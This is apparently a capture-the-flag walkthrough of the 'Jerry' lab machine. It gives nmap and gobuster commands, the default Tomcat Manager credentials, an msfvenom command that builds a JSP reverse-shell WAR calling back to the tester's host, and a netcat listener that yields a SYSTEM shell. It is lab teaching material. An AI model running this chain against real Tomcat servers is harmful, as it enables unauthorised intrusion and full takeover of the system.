Jerry
Last updated
Was this helpful?
Last updated
Was this helpful?
As usual, we start with an nmap scan, in order to find open ports in the target machine.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.95 -oN allPorts
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.
As we see, port 8080 is the only one that is open. It looks like there is an HTTP service, let's try to obtain more information about the service and version running on that port. The following command will scan port 8080 more in depth and save the result into a file:
nmap -sC -sV -p8080 10.10.10.95 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.
So we have an Apache Tomcat/Coyote JSP server. If we take a look into the web page with the web browser, we see the Apache default web page.
At this point, I would try to enumerate the web page directories with gobuster.
gobuster dir -u http://10.10.10.95:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200
dir enumerates directories or files.
-u the target URL.
-w path to the wordlist.
-t number of current threads, in this case 200 threads.
If we take a look at the /manager directory, a popup login form appears.
Let's try some random credentials, such as user admin password admin.
We get a 403 Access Denied message. If you look closely, some default credentials appear on a certain line.
Now we have the user tomcat with the password s3cret. Let's refresh the page and enter the default credentials.
If you refresh the page and the 403 message still appears, close the browser and open it again.
And we got in! The next step is to get a reverse shell. If we check out the web page, we could see there is a Deploy section in which we can upload WAR files.
At this point, the idea is to create a WAR payload with msfvenom, upload it to the web page, and get a reverse shell.
msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.14 lport=4444 -f war -o reverse_shell.war
-p indicates the type of payload.
lhost local host IP.
lport local port of the listener.
-f output format.
-o save the output to a file.
All we have to do is upload the payload and hit Deploy.
Under the Application section, a new row should appear with the path of our uploaded payload.
Finally, all we have to do is set a netcat listener on port 4444 and hit the /reverse_shell path.
nc -lvnp 4444
-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.
We are already the nt authority\system user, so all we have to do is reap the harvest and get the flags.
